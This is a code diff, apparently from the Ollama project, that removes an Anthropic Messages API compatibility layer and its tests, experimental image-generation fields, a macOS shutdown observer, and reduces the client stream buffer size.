-		events = append(events, StreamEvent{
-			Event: "content_block_delta",
-			Data: ContentBlockDeltaEvent{
-				Type:  "content_block_delta",
-				Index: c.contentIndex,
-				Delta: Delta{
-					Type:        "input_json_delta",
-					PartialJSON: string(argsJSON),
-				},
-			},
-		})
-
-		events = append(events, StreamEvent{
-			Event: "content_block_stop",
-			Data: ContentBlockStopEvent{
-				Type:  "content_block_stop",
-				Index: c.contentIndex,
-			},
-		})
-
-		c.toolCallsSent[tc.ID] = true
-		c.contentIndex++
-	}
-
-	if r.Done {
-		if c.textStarted {
-			events = append(events, StreamEvent{
-				Event: "content_block_stop",
-				Data: ContentBlockStopEvent{
-					Type:  "content_block_stop",
-					Index: c.contentIndex,
-				},
-			})
-		} else if c.thinkingStarted && !c.thinkingDone {
-			events = append(events, StreamEvent{
-				Event: "content_block_stop",
-				Data: ContentBlockStopEvent{
-					Type:  "content_block_stop",
-					Index: c.contentIndex,
-				},
-			})
-		}
-
-		c.outputTokens = r.Metrics.EvalCount
-		stopReason := mapStopReason(r.DoneReason, len(c.toolCallsSent) > 0)
-
-		events = append(events, StreamEvent{
-			Event: "message_delta",
-			Data: MessageDeltaEvent{
-				Type: "message_delta",
-				Delta: MessageDelta{
-					StopReason: stopReason,
-				},
-				Usage: DeltaUsage{
-					OutputTokens: c.outputTokens,
-				},
-			},
-		})
-
-		events = append(events, StreamEvent{
-			Event: "message_stop",
-			Data: MessageStopEvent{
-				Type: "message_stop",
-			},
-		})
-	}
-
-	return events
-}
-
-// generateID generates a unique ID with the given prefix using crypto/rand
-func generateID(prefix string) string {
-	b := make([]byte, 12)
-	if _, err := rand.Read(b); err != nil {
-		// Fallback to time-based ID if crypto/rand fails
-		return fmt.Sprintf("%s_%d", prefix, time.Now().UnixNano())
-	}
-	return fmt.Sprintf("%s_%x", prefix, b)
-}
-
-// GenerateMessageID generates a unique message ID
-func GenerateMessageID() string {
-	return generateID("msg")
-}
-
-// ptr returns a pointer to the given string value
-func ptr(s string) *string {
-	return &s
-}
-
-// mapToArgs converts a map to ToolCallFunctionArguments
-func mapToArgs(m map[string]any) api.ToolCallFunctionArguments {
-	args := api.NewToolCallFunctionArguments()
-	for k, v := range m {
-		args.Set(k, v)
-	}
-	return args
-}
--- a/anthropic/anthropic_test.go
+++ b/anthropic/anthropic_test.go
@@ -1,953 +0,0 @@
-package anthropic
-
-import (
-	"encoding/base64"
-	"encoding/json"
-	"testing"
-
-	"github.com/google/go-cmp/cmp"
-
-	"github.com/ollama/ollama/api"
-)
-
-const (
-	testImage = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
-)
-
-// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
-func testArgs(m map[string]any) api.ToolCallFunctionArguments {
-	args := api.NewToolCallFunctionArguments()
-	for k, v := range m {
-		args.Set(k, v)
-	}
-	return args
-}
-
-func TestFromMessagesRequest_Basic(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{Role: "user", Content: "Hello"},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if result.Model != "test-model" {
-		t.Errorf("expected model 'test-model', got %q", result.Model)
-	}
-
-	if len(result.Messages) != 1 {
-		t.Fatalf("expected 1 message, got %d", len(result.Messages))
-	}
-
-	if result.Messages[0].Role != "user" || result.Messages[0].Content != "Hello" {
-		t.Errorf("unexpected message: %+v", result.Messages[0])
-	}
-
-	if numPredict, ok := result.Options["num_predict"].(int); !ok || numPredict != 1024 {
-		t.Errorf("expected num_predict 1024, got %v", result.Options["num_predict"])
-	}
-}
-
-func TestFromMessagesRequest_WithSystemPrompt(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		System:    "You are a helpful assistant.",
-		Messages: []MessageParam{
-			{Role: "user", Content: "Hello"},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 2 {
-		t.Fatalf("expected 2 messages, got %d", len(result.Messages))
-	}
-
-	if result.Messages[0].Role != "system" || result.Messages[0].Content != "You are a helpful assistant." {
-		t.Errorf("unexpected system message: %+v", result.Messages[0])
-	}
-}
-
-func TestFromMessagesRequest_WithSystemPromptArray(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		System: []any{
-			map[string]any{"type": "text", "text": "You are helpful."},
-			map[string]any{"type": "text", "text": " Be concise."},
-		},
-		Messages: []MessageParam{
-			{Role: "user", Content: "Hello"},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 2 {
-		t.Fatalf("expected 2 messages, got %d", len(result.Messages))
-	}
-
-	if result.Messages[0].Content != "You are helpful. Be concise." {
-		t.Errorf("unexpected system message content: %q", result.Messages[0].Content)
-	}
-}
-
-func TestFromMessagesRequest_WithOptions(t *testing.T) {
-	temp := 0.7
-	topP := 0.9
-	topK := 40
-	req := MessagesRequest{
-		Model:         "test-model",
-		MaxTokens:     2048,
-		Messages:      []MessageParam{{Role: "user", Content: "Hello"}},
-		Temperature:   &temp,
-		TopP:          &topP,
-		TopK:          &topK,
-		StopSequences: []string{"\n", "END"},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if result.Options["temperature"] != 0.7 {
-		t.Errorf("expected temperature 0.7, got %v", result.Options["temperature"])
-	}
-	if result.Options["top_p"] != 0.9 {
-		t.Errorf("expected top_p 0.9, got %v", result.Options["top_p"])
-	}
-	if result.Options["top_k"] != 40 {
-		t.Errorf("expected top_k 40, got %v", result.Options["top_k"])
-	}
-	if diff := cmp.Diff([]string{"\n", "END"}, result.Options["stop"]); diff != "" {
-		t.Errorf("stop sequences mismatch: %s", diff)
-	}
-}
-
-func TestFromMessagesRequest_WithImage(t *testing.T) {
-	imgData, _ := base64.StdEncoding.DecodeString(testImage)
-
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{
-				Role: "user",
-				Content: []any{
-					map[string]any{"type": "text", "text": "What's in this image?"},
-					map[string]any{
-						"type": "image",
-						"source": map[string]any{
-							"type":       "base64",
-							"media_type": "image/png",
-							"data":       testImage,
-						},
-					},
-				},
-			},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 1 {
-		t.Fatalf("expected 1 message, got %d", len(result.Messages))
-	}
-
-	if result.Messages[0].Content != "What's in this image?" {
-		t.Errorf("expected content 'What's in this image?', got %q", result.Messages[0].Content)
-	}
-
-	if len(result.Messages[0].Images) != 1 {
-		t.Fatalf("expected 1 image, got %d", len(result.Messages[0].Images))
-	}
-
-	if string(result.Messages[0].Images[0]) != string(imgData) {
-		t.Error("image data mismatch")
-	}
-}
-
-func TestFromMessagesRequest_WithToolUse(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{Role: "user", Content: "What's the weather in Paris?"},
-			{
-				Role: "assistant",
-				Content: []any{
-					map[string]any{
-						"type":  "tool_use",
-						"id":    "call_123",
-						"name":  "get_weather",
-						"input": map[string]any{"location": "Paris"},
-					},
-				},
-			},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 2 {
-		t.Fatalf("expected 2 messages, got %d", len(result.Messages))
-	}
-
-	if len(result.Messages[1].ToolCalls) != 1 {
-		t.Fatalf("expected 1 tool call, got %d", len(result.Messages[1].ToolCalls))
-	}
-
-	tc := result.Messages[1].ToolCalls[0]
-	if tc.ID != "call_123" {
-		t.Errorf("expected tool call ID 'call_123', got %q", tc.ID)
-	}
-	if tc.Function.Name != "get_weather" {
-		t.Errorf("expected tool name 'get_weather', got %q", tc.Function.Name)
-	}
-}
-
-func TestFromMessagesRequest_WithToolResult(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{
-				Role: "user",
-				Content: []any{
-					map[string]any{
-						"type":        "tool_result",
-						"tool_use_id": "call_123",
-						"content":     "The weather in Paris is sunny, 22°C",
-					},
-				},
-			},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 1 {
-		t.Fatalf("expected 1 message, got %d", len(result.Messages))
-	}
-
-	msg := result.Messages[0]
-	if msg.Role != "tool" {
-		t.Errorf("expected role 'tool', got %q", msg.Role)
-	}
-	if msg.ToolCallID != "call_123" {
-		t.Errorf("expected tool_call_id 'call_123', got %q", msg.ToolCallID)
-	}
-	if msg.Content != "The weather in Paris is sunny, 22°C" {
-		t.Errorf("unexpected content: %q", msg.Content)
-	}
-}
-
-func TestFromMessagesRequest_WithTools(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages:  []MessageParam{{Role: "user", Content: "Hello"}},
-		Tools: []Tool{
-			{
-				Name:        "get_weather",
-				Description: "Get current weather",
-				InputSchema: json.RawMessage(`{"type":"object","properties":{"location":{"type":"string"}},"required":["location"]}`),
-			},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Tools) != 1 {
-		t.Fatalf("expected 1 tool, got %d", len(result.Tools))
-	}
-
-	tool := result.Tools[0]
-	if tool.Type != "function" {
-		t.Errorf("expected type 'function', got %q", tool.Type)
-	}
-	if tool.Function.Name != "get_weather" {
-		t.Errorf("expected name 'get_weather', got %q", tool.Function.Name)
-	}
-	if tool.Function.Description != "Get current weather" {
-		t.Errorf("expected description 'Get current weather', got %q", tool.Function.Description)
-	}
-}
-
-func TestFromMessagesRequest_WithThinking(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages:  []MessageParam{{Role: "user", Content: "Hello"}},
-		Thinking:  &ThinkingConfig{Type: "enabled", BudgetTokens: 1000},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if result.Think == nil {
-		t.Fatal("expected Think to be set")
-	}
-	if v, ok := result.Think.Value.(bool); !ok || !v {
-		t.Errorf("expected Think.Value to be true, got %v", result.Think.Value)
-	}
-}
-
-// TestFromMessagesRequest_ThinkingOnlyBlock verifies that messages containing only
-// a thinking block (no text, images, or tool calls) are preserved and not dropped.
-func TestFromMessagesRequest_ThinkingOnlyBlock(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{Role: "user", Content: "Hello"},
-			{
-				Role: "assistant",
-				Content: []any{
-					map[string]any{
-						"type":     "thinking",
-						"thinking": "Let me think about this...",
-					},
-				},
-			},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 2 {
-		t.Fatalf("expected 2 messages, got %d", len(result.Messages))
-	}
-
-	assistantMsg := result.Messages[1]
-	if assistantMsg.Thinking != "Let me think about this..." {
-		t.Errorf("expected thinking content, got %q", assistantMsg.Thinking)
-	}
-}
-
-func TestFromMessagesRequest_ToolUseMissingID(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{
-				Role: "assistant",
-				Content: []any{
-					map[string]any{
-						"type": "tool_use",
-						"name": "get_weather",
-					},
-				},
-			},
-		},
-	}
-
-	_, err := FromMessagesRequest(req)
-	if err == nil {
-		t.Fatal("expected error for missing tool_use id")
-	}
-	if err.Error() != "tool_use block missing required 'id' field" {
-		t.Errorf("unexpected error message: %v", err)
-	}
-}
-
-func TestFromMessagesRequest_ToolUseMissingName(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{
-				Role: "assistant",
-				Content: []any{
-					map[string]any{
-						"type": "tool_use",
-						"id":   "call_123",
-					},
-				},
-			},
-		},
-	}
-
-	_, err := FromMessagesRequest(req)
-	if err == nil {
-		t.Fatal("expected error for missing tool_use name")
-	}
-	if err.Error() != "tool_use block missing required 'name' field" {
-		t.Errorf("unexpected error message: %v", err)
-	}
-}
-
-func TestFromMessagesRequest_InvalidToolSchema(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages:  []MessageParam{{Role: "user", Content: "Hello"}},
-		Tools: []Tool{
-			{
-				Name:        "bad_tool",
-				InputSchema: json.RawMessage(`{invalid json`),
-			},
-		},
-	}
-
-	_, err := FromMessagesRequest(req)
-	if err == nil {
-		t.Fatal("expected error for invalid tool schema")
-	}
-}
-
-func TestToMessagesResponse_Basic(t *testing.T) {
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role:    "assistant",
-			Content: "Hello there!",
-		},
-		Done:       true,
-		DoneReason: "stop",
-		Metrics: api.Metrics{
-			PromptEvalCount: 10,
-			EvalCount:       5,
-		},
-	}
-
-	result := ToMessagesResponse("msg_123", resp)
-
-	if result.ID != "msg_123" {
-		t.Errorf("expected ID 'msg_123', got %q", result.ID)
-	}
-	if result.Type != "message" {
-		t.Errorf("expected type 'message', got %q", result.Type)
-	}
-	if result.Role != "assistant" {
-		t.Errorf("expected role 'assistant', got %q", result.Role)
-	}
-	if len(result.Content) != 1 {
-		t.Fatalf("expected 1 content block, got %d", len(result.Content))
-	}
-	if result.Content[0].Type != "text" || result.Content[0].Text == nil || *result.Content[0].Text != "Hello there!" {
-		t.Errorf("unexpected content: %+v", result.Content[0])
-	}
-	if result.StopReason != "end_turn" {
-		t.Errorf("expected stop_reason 'end_turn', got %q", result.StopReason)
-	}
-	if result.Usage.InputTokens != 10 || result.Usage.OutputTokens != 5 {
-		t.Errorf("unexpected usage: %+v", result.Usage)
-	}
-}
-
-func TestToMessagesResponse_WithToolCalls(t *testing.T) {
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role: "assistant",
-			ToolCalls: []api.ToolCall{
-				{
-					ID: "call_123",
-					Function: api.ToolCallFunction{
-						Name:      "get_weather",
-						Arguments: testArgs(map[string]any{"location": "Paris"}),
-					},
-				},
-			},
-		},
-		Done:       true,
-		DoneReason: "stop",
-	}
-
-	result := ToMessagesResponse("msg_123", resp)
-
-	if len(result.Content) != 1 {
-		t.Fatalf("expected 1 content block, got %d", len(result.Content))
-	}
-	if result.Content[0].Type != "tool_use" {
-		t.Errorf("expected type 'tool_use', got %q", result.Content[0].Type)
-	}
-	if result.Content[0].ID != "call_123" {
-		t.Errorf("expected ID 'call_123', got %q", result.Content[0].ID)
-	}
-	if result.Content[0].Name != "get_weather" {
-		t.Errorf("expected name 'get_weather', got %q", result.Content[0].Name)
-	}
-	if result.StopReason != "tool_use" {
-		t.Errorf("expected stop_reason 'tool_use', got %q", result.StopReason)
-	}
-}
-
-func TestToMessagesResponse_WithThinking(t *testing.T) {
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role:     "assistant",
-			Content:  "The answer is 42.",
-			Thinking: "Let me think about this...",
-		},
-		Done:       true,
-		DoneReason: "stop",
-	}
-
-	result := ToMessagesResponse("msg_123", resp)
-
-	if len(result.Content) != 2 {
-		t.Fatalf("expected 2 content blocks, got %d", len(result.Content))
-	}
-	if result.Content[0].Type != "thinking" {
-		t.Errorf("expected first block type 'thinking', got %q", result.Content[0].Type)
-	}
-	if result.Content[0].Thinking == nil || *result.Content[0].Thinking != "Let me think about this..." {
-		t.Errorf("unexpected thinking content: %v", result.Content[0].Thinking)
-	}
-	if result.Content[1].Type != "text" {
-		t.Errorf("expected second block type 'text', got %q", result.Content[1].Type)
-	}
-}
-
-func TestMapStopReason(t *testing.T) {
-	tests := []struct {
-		reason       string
-		hasToolCalls bool
-		want         string
-	}{
-		{"stop", false, "end_turn"},
-		{"length", false, "max_tokens"},
-		{"stop", true, "tool_use"},
-		{"other", false, "stop_sequence"},
-		{"", false, ""},
-	}
-
-	for _, tt := range tests {
-		got := mapStopReason(tt.reason, tt.hasToolCalls)
-		if got != tt.want {
-			t.Errorf("mapStopReason(%q, %v) = %q, want %q", tt.reason, tt.hasToolCalls, got, tt.want)
-		}
-	}
-}
-
-func TestNewError(t *testing.T) {
-	tests := []struct {
-		code int
-		want string
-	}{
-		{400, "invalid_request_error"},
-		{401, "authentication_error"},
-		{403, "permission_error"},
-		{404, "not_found_error"},
-		{429, "rate_limit_error"},
-		{500, "api_error"},
-		{503, "overloaded_error"},
-		{529, "overloaded_error"},
-	}
-
-	for _, tt := range tests {
-		result := NewError(tt.code, "test message")
-		if result.Type != "error" {
-			t.Errorf("NewError(%d) type = %q, want 'error'", tt.code, result.Type)
-		}
-		if result.Error.Type != tt.want {
-			t.Errorf("NewError(%d) error.type = %q, want %q", tt.code, result.Error.Type, tt.want)
-		}
-		if result.Error.Message != "test message" {
-			t.Errorf("NewError(%d) message = %q, want 'test message'", tt.code, result.Error.Message)
-		}
-		if result.RequestID == "" {
-			t.Errorf("NewError(%d) request_id should not be empty", tt.code)
-		}
-	}
-}
-
-func TestGenerateMessageID(t *testing.T) {
-	id1 := GenerateMessageID()
-	id2 := GenerateMessageID()
-
-	if id1 == "" {
-		t.Error("GenerateMessageID returned empty string")
-	}
-	if id1 == id2 {
-		t.Error("GenerateMessageID returned duplicate IDs")
-	}
-	if len(id1) < 10 {
-		t.Errorf("GenerateMessageID returned short ID: %q", id1)
-	}
-	if id1[:4] != "msg_" {
-		t.Errorf("GenerateMessageID should start with 'msg_', got %q", id1[:4])
-	}
-}
-
-func TestStreamConverter_Basic(t *testing.T) {
-	conv := NewStreamConverter("msg_123", "test-model")
-
-	// First chunk
-	resp1 := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role:    "assistant",
-			Content: "Hello",
-		},
-		Metrics: api.Metrics{PromptEvalCount: 10},
-	}
-
-	events1 := conv.Process(resp1)
-	if len(events1) < 3 {
-		t.Fatalf("expected at least 3 events for first chunk, got %d", len(events1))
-	}
-
-	// Should have message_start, content_block_start, content_block_delta
-	if events1[0].Event != "message_start" {
-		t.Errorf("expected first event 'message_start', got %q", events1[0].Event)
-	}
-	if events1[1].Event != "content_block_start" {
-		t.Errorf("expected second event 'content_block_start', got %q", events1[1].Event)
-	}
-	if events1[2].Event != "content_block_delta" {
-		t.Errorf("expected third event 'content_block_delta', got %q", events1[2].Event)
-	}
-
-	// Final chunk
-	resp2 := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role:    "assistant",
-			Content: " world!",
-		},
-		Done:       true,
-		DoneReason: "stop",
-		Metrics:    api.Metrics{EvalCount: 5},
-	}
-
-	events2 := conv.Process(resp2)
-
-	// Should have content_block_delta, content_block_stop, message_delta, message_stop
-	hasStop := false
-	for _, e := range events2 {
-		if e.Event == "message_stop" {
-			hasStop = true
-		}
-	}
-	if !hasStop {
-		t.Error("expected message_stop event in final chunk")
-	}
-}
-
-func TestStreamConverter_WithToolCalls(t *testing.T) {
-	conv := NewStreamConverter("msg_123", "test-model")
-
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role: "assistant",
-			ToolCalls: []api.ToolCall{
-				{
-					ID: "call_123",
-					Function: api.ToolCallFunction{
-						Name:      "get_weather",
-						Arguments: testArgs(map[string]any{"location": "Paris"}),
-					},
-				},
-			},
-		},
-		Done:       true,
-		DoneReason: "stop",
-		Metrics:    api.Metrics{PromptEvalCount: 10, EvalCount: 5},
-	}
-
-	events := conv.Process(resp)
-
-	hasToolStart := false
-	hasToolDelta := false
-	for _, e := range events {
-		if e.Event == "content_block_start" {
-			if start, ok := e.Data.(ContentBlockStartEvent); ok {
-				if start.ContentBlock.Type == "tool_use" {
-					hasToolStart = true
-				}
-			}
-		}
-		if e.Event == "content_block_delta" {
-			if delta, ok := e.Data.(ContentBlockDeltaEvent); ok {
-				if delta.Delta.Type == "input_json_delta" {
-					hasToolDelta = true
-				}
-			}
-		}
-	}
-
-	if !hasToolStart {
-		t.Error("expected tool_use content_block_start event")
-	}
-	if !hasToolDelta {
-		t.Error("expected input_json_delta event")
-	}
-}
-
-func TestStreamConverter_ToolCallWithUnmarshalableArgs(t *testing.T) {
-	// Test that unmarshalable arguments (like channels) are handled gracefully
-	// and don't cause a panic or corrupt stream
-	conv := NewStreamConverter("msg_123", "test-model")
-
-	// Create a channel which cannot be JSON marshaled
-	unmarshalable := make(chan int)
-	badArgs := api.NewToolCallFunctionArguments()
-	badArgs.Set("channel", unmarshalable)
-
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role: "assistant",
-			ToolCalls: []api.ToolCall{
-				{
-					ID: "call_bad",
-					Function: api.ToolCallFunction{
-						Name:      "bad_function",
-						Arguments: badArgs,
-					},
-				},
-			},
-		},
-		Done:       true,
-		DoneReason: "stop",
-	}
-
-	// Should not panic and should skip the unmarshalable tool call
-	events := conv.Process(resp)
-
-	// Verify no tool_use block was started (since marshal failed before block start)
-	hasToolStart := false
-	for _, e := range events {
-		if e.Event == "content_block_start" {
-			if start, ok := e.Data.(ContentBlockStartEvent); ok {
-				if start.ContentBlock.Type == "tool_use" {
-					hasToolStart = true
-				}
-			}
-		}
-	}
-
-	if hasToolStart {
-		t.Error("expected no tool_use block when arguments cannot be marshaled")
-	}
-}
-
-func TestStreamConverter_MultipleToolCallsWithMixedValidity(t *testing.T) {
-	// Test that valid tool calls still work when mixed with invalid ones
-	conv := NewStreamConverter("msg_123", "test-model")
-
-	unmarshalable := make(chan int)
-	badArgs := api.NewToolCallFunctionArguments()
-	badArgs.Set("channel", unmarshalable)
-
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role: "assistant",
-			ToolCalls: []api.ToolCall{
-				{
-					ID: "call_good",
-					Function: api.ToolCallFunction{
-						Name:      "good_function",
-						Arguments: testArgs(map[string]any{"location": "Paris"}),
-					},
-				},
-				{
-					ID: "call_bad",
-					Function: api.ToolCallFunction{
-						Name:      "bad_function",
-						Arguments: badArgs,
-					},
-				},
-			},
-		},
-		Done:       true,
-		DoneReason: "stop",
-	}
-
-	events := conv.Process(resp)
-
-	// Count tool_use blocks - should only have 1 (the valid one)
-	toolStartCount := 0
-	toolDeltaCount := 0
-	for _, e := range events {
-		if e.Event == "content_block_start" {
-			if start, ok := e.Data.(ContentBlockStartEvent); ok {
-				if start.ContentBlock.Type == "tool_use" {
-					toolStartCount++
-					if start.ContentBlock.Name != "good_function" {
-						t.Errorf("expected tool name 'good_function', got %q", start.ContentBlock.Name)
-					}
-				}
-			}
-		}
-		if e.Event == "content_block_delta" {
-			if delta, ok := e.Data.(ContentBlockDeltaEvent); ok {
-				if delta.Delta.Type == "input_json_delta" {
-					toolDeltaCount++
-				}
-			}
-		}
-	}
-
-	if toolStartCount != 1 {
-		t.Errorf("expected 1 tool_use block, got %d", toolStartCount)
-	}
-	if toolDeltaCount != 1 {
-		t.Errorf("expected 1 input_json_delta, got %d", toolDeltaCount)
-	}
-}
-
-// TestContentBlockJSON_EmptyFieldsPresent verifies that empty text and thinking fields
-// are serialized in JSON output. The Anthropic SDK requires these fields to be present
-// (even when empty) in content_block_start events to properly accumulate streaming deltas.
-// Without these fields, the SDK throws: "TypeError: unsupported operand type(s) for +=: 'NoneType' and 'str'"
-func TestContentBlockJSON_EmptyFieldsPresent(t *testing.T) {
-	tests := []struct {
-		name     string
-		block    ContentBlock
-		wantKeys []string
-	}{
-		{
-			name: "text block includes empty text field",
-			block: ContentBlock{
-				Type: "text",
-				Text: ptr(""),
-			},
-			wantKeys: []string{"type", "text"},
-		},
-		{
-			name: "thinking block includes empty thinking field",
-			block: ContentBlock{
-				Type:     "thinking",
-				Thinking: ptr(""),
-			},
-			wantKeys: []string{"type", "thinking"},
-		},
-		{
-			name: "text block with content",
-			block: ContentBlock{
-				Type: "text",
-				Text: ptr("hello"),
-			},
-			wantKeys: []string{"type", "text"},
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			data, err := json.Marshal(tt.block)
-			if err != nil {
-				t.Fatalf("failed to marshal: %v", err)
-			}
-
-			var result map[string]any
-			if err := json.Unmarshal(data, &result); err != nil {
-				t.Fatalf("failed to unmarshal: %v", err)
-			}
-
-			for _, key := range tt.wantKeys {
-				if _, ok := result[key]; !ok {
-					t.Errorf("expected key %q to be present in JSON output, got: %s", key, string(data))
-				}
-			}
-		})
-	}
-}
-
-// TestStreamConverter_ContentBlockStartIncludesEmptyFields verifies that content_block_start
-// events include the required empty fields for SDK compatibility.
-func TestStreamConverter_ContentBlockStartIncludesEmptyFields(t *testing.T) {
-	t.Run("text block start includes empty text", func(t *testing.T) {
-		conv := NewStreamConverter("msg_123", "test-model")
-
-		resp := api.ChatResponse{
-			Model:   "test-model",
-			Message: api.Message{Role: "assistant", Content: "hello"},
-		}
-
-		events := conv.Process(resp)
-
-		var foundTextStart bool
-		for _, e := range events {
-			if e.Event == "content_block_start" {
-				if start, ok := e.Data.(ContentBlockStartEvent); ok {
-					if start.ContentBlock.Type == "text" {
-						foundTextStart = true
-						// Marshal and verify the text field is present
-						data, _ := json.Marshal(start)
-						var result map[string]any
-						json.Unmarshal(data, &result)
-						cb := result["content_block"].(map[string]any)
-						if _, ok := cb["text"]; !ok {
-							t.Error("content_block_start for text should include 'text' field")
-						}
-					}
-				}
-			}
-		}
-
-		if !foundTextStart {
-			t.Error("expected text content_block_start event")
-		}
-	})
-
-	t.Run("thinking block start includes empty thinking", func(t *testing.T) {
-		conv := NewStreamConverter("msg_123", "test-model")
-
-		resp := api.ChatResponse{
-			Model:   "test-model",
-			Message: api.Message{Role: "assistant", Thinking: "let me think..."},
-		}
-
-		events := conv.Process(resp)
-
-		var foundThinkingStart bool
-		for _, e := range events {
-			if e.Event == "content_block_start" {
-				if start, ok := e.Data.(ContentBlockStartEvent); ok {
-					if start.ContentBlock.Type == "thinking" {
-						foundThinkingStart = true
-						data, _ := json.Marshal(start)
-						var result map[string]any
-						json.Unmarshal(data, &result)
-						cb := result["content_block"].(map[string]any)
-						if _, ok := cb["thinking"]; !ok {
-							t.Error("content_block_start for thinking should include 'thinking' field")
-						}
-					}
-				}
-			}
-		}
-
-		if !foundThinkingStart {
-			t.Error("expected thinking content_block_start event")
-		}
-	})
-}
--- a/api/client.go
+++ b/api/client.go
@@ -165,7 +165,7 @@ func (c *Client) do(ctx context.Context, method, path string, reqData, respData
 	return nil
 }

-const maxBufferSize = 8 * format.MegaByte
+const maxBufferSize = 512 * format.KiloByte

 func (c *Client) stream(ctx context.Context, method, path string, data any, fn func([]byte) error) error {
 	var buf io.Reader
--- a/api/types.go
+++ b/api/types.go
@@ -127,20 +127,6 @@ type GenerateRequest struct {
 	// each with an associated log probability. Only applies when Logprobs is true.
 	// Valid values are 0-20. Default is 0 (only return the selected token's logprob).
 	TopLogprobs int `json:"top_logprobs,omitempty"`
-
-	// Experimental: Image generation fields (may change or be removed)
-
-	// Width is the width of the generated image in pixels.
-	// Only used for image generation models.
-	Width int32 `json:"width,omitempty"`
-
-	// Height is the height of the generated image in pixels.
-	// Only used for image generation models.
-	Height int32 `json:"height,omitempty"`
-
-	// Steps is the number of diffusion steps for image generation.
-	// Only used for image generation models.
-	Steps int32 `json:"steps,omitempty"`
 }

 // ChatRequest describes a request sent by [Client.Chat].
@@ -874,20 +860,6 @@ type GenerateResponse struct {
 	// Logprobs contains log probability information for the generated tokens,
 	// if requested via the Logprobs parameter.
 	Logprobs []Logprob `json:"logprobs,omitempty"`
-
-	// Experimental: Image generation fields (may change or be removed)
-
-	// Image contains a base64-encoded generated image.
-	// Only present for image generation models.
-	Image string `json:"image,omitempty"`
-
-	// Completed is the number of completed steps in image generation.
-	// Only present for image generation models during streaming.
-	Completed int64 `json:"completed,omitempty"`
-
-	// Total is the total number of steps for image generation.
-	// Only present for image generation models during streaming.
-	Total int64 `json:"total,omitempty"`
 }

 // ModelDetails provides details about a model.
--- a/app/cmd/app/app_darwin.m
+++ b/app/cmd/app/app_darwin.m
@@ -14,7 +14,6 @@ extern NSString *SystemWidePath;
@interface AppDelegate () <NSWindowDelegate, WKNavigationDelegate, WKUIDelegate>
@property(strong, nonatomic) NSStatusItem *statusItem;
@property(assign, nonatomic) BOOL updateAvailable;
-@property(assign, nonatomic) BOOL systemShutdownInProgress;
@end

@implementation AppDelegate
@@ -41,13 +40,6 @@ bool firstTimeRun,startHidden; // Set in run before initialization
 }

 - (void)applicationDidFinishLaunching:(NSNotification *)aNotification {
-    // Register for system shutdown/restart notification so we can allow termination
-    [[[NSWorkspace sharedWorkspace] notificationCenter]
-        addObserver:self
-           selector:@selector(systemWillPowerOff:)
-               name:NSWorkspaceWillPowerOffNotification
-             object:nil];
-
    // if we're in development mode, set the app icon
    NSString *bundlePath = [[NSBundle mainBundle] bundlePath];
    if (![bundlePath hasSuffix:@".app"]) {
@@ -286,18 +278,7 @@ bool firstTimeRun,startHidden; // Set in run before initialization
    [NSApp activateIgnoringOtherApps:YES];
 }

